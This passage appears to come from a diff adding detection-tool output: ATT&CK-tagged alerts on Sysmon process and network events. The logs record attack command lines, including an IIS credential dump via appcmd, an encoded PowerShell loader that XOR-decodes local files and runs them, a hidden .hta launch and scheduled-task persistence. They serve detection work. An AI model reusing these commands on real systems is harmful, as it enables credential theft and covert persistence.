+    <Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-1231-610F-0000-002057A80700</Data>
+    <Data Name=""LogonId"">0x7a857</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-1239-610F-0000-0010D0210A00</Data>
+    <Data Name=""ParentProcessId"">600</Data>
+    <Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920559.473868,2019-05-27T05:29:19.473868+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:19.473868Z"">
+    </TimeCreated>
+    <EventRecordID>5961</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:19.433</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-00100FC7FF00</Data>
+    <Data Name=""ProcessId"">2168</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir /text:password</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1589069393.260757,2020-05-10T04:09:53.260757+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-05-10T00:09:43.372595Z"">
+    </TimeCreated>
+    <EventRecordID>112972</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2728"" ThreadID=""3432"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-05-10 00:09:43.370</Data>
+    <Data Name=""ProcessGuid"">747F3D96-4647-5EB7-0000-0010B3454B01</Data>
+    <Data Name=""ProcessId"">7672</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">whoami.exe</Data>
+    <Data Name=""CommandLine"">whoami</Data>
+    <Data Name=""CurrentDirectory"">c:\Users\IEUser\Tools\PrivEsc\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-3B92-5EB5-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-4640-5EB7-0000-0010EF364B01</Data>
+    <Data Name=""ParentProcessId"">372</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">c:\Windows\System32\cmd.exe</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920559.403767,2019-05-27T05:29:19.403767+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:19.403767Z"">
+    </TimeCreated>
+    <EventRecordID>5958</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:19.353</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-00104FC3FF00</Data>
+    <Data Name=""ProcessId"">2484</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir /text:userName</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564913815.299641,2019-08-04T14:16:55.299641+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-04T10:16:50.455910Z"">
+    </TimeCreated>
+    <EventRecordID>5951</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2780"" ThreadID=""3676"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-04 10:16:50.403</Data>
+    <Data Name=""ProcessGuid"">747F3D96-B092-5D46-0000-001089041204</Data>
+    <Data Name=""ProcessId"">7792</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\cmd.exe </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
+    <Data Name=""LogonId"">0x18d3b3</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-B091-5D46-0000-001081F71104</Data>
+    <Data Name=""ParentProcessId"">820</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c start C:\Windows\system32\cmd.exe</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1603490256.411768,2020-10-24T01:57:36.411768+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot;  /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-23T21:57:36.399534Z"">
+    </TimeCreated>
+    <EventRecordID>424076</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3208"" ThreadID=""4804"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-23 21:57:36.394</Data>
+    <Data Name=""ProcessGuid"">747F3D96-51D0-5F93-0000-0010B2B35B00</Data>
+    <Data Name=""ProcessId"">5572</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot;  /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\tmp1375\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002085A50800</Data>
+    <Data Name=""LogonId"">0x8a585</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=E2EAD0993B917E1828A658ADA0B87E01D5B8424F,MD5=C43699F84A68608E7E57C43B7761BBB8,SHA256=2EDB180274A51C83DDF8414D99E90315A9047B18C51DFD070326214D4DA59651,IMPHASH=392B4D61B1D1DADC1F06444DF258188A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-51D0-5F93-0000-001036A15B00</Data>
+    <Data Name=""ParentProcessId"">3396</Data>
+    <Data Name=""ParentImage"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; conf3234.dll f8753 d948</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1595802375.141778,2020-07-27T02:26:15.141778+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 127.0.0.1 ) to hostname ( MSEDGEWIN10 ) , IP ( 127.0.0.1 ) and port ( 445 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-07-26T22:26:15.141764Z"">
+    </TimeCreated>
+    <EventRecordID>339223</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3332"" ThreadID=""3580"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-07-26 22:13:19.375</Data>
+    <Data Name=""ProcessGuid"">747F3D96-FF9D-5F1D-0000-00100AC62400</Data>
+    <Data Name=""ProcessId"">7400</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">true</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">127.0.0.1</Data>
+    <Data Name=""SourceHostname"">MSEDGEWIN10</Data>
+    <Data Name=""SourcePort"">49796</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">127.0.0.1</Data>
+    <Data Name=""DestinationHostname"">MSEDGEWIN10</Data>
+    <Data Name=""DestinationPort"">445</Data>
+    <Data Name=""DestinationPortName"">microsoft-ds</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920559.323652,2019-05-27T05:29:19.323652+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir &quot;Filename: redirection.config&quot; /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:19.323652Z"">
+    </TimeCreated>
+    <EventRecordID>5955</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:19.283</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-00108FBFFF00</Data>
+    <Data Name=""ProcessId"">168</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
